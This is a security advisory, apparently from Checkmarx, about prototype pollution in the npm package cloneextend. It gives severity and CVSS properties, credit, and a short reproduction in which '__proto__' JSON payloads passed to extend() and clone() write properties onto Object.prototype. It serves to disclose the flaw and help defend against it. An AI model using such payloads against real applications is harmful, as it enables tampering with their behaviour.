Prototype Pollution In Cloneextend: CX-2021-4799

Severity

Severity: 5.6 (Medium)

Advisory Timeline Summary
Affected versions of cloneextend (npm) are vulnerable to prototype pollution via the clone and extend functions.

Product

All versions of cloneextend npm package.

Impact

If attacker-controlled data reaches one of the affected functions, properties can be written onto Object.prototype, so every object in the process inherits them. The concrete impact depends on how the application later reads those properties.

Steps To Reproduce

var ce = require('cloneextend');

// extend(): the parsed "__proto__" key is walked into Object.prototype
ce.extend({}, JSON.parse('{"__proto__":{"polluted":1}}'));
console.log({}.polluted); // an unrelated, freshly created object now sees the property
>1

// clone(): the same effect through the clone path
ce.clone(JSON.parse('{"__proto__":{"a":1}}'));
console.log({}.a);
>1

Expected Result:

Both console.log calls print 1, although neither object literal defines the property.

Remediation

Currently no fix has been released. As a workaround, avoid passing untrusted inputs to the vulnerable functions.

Properties

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

User Interaction: None

Scope: Unchanged

Confidentiality: Low

Integrity: Low

Availability: Low

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. NPM Package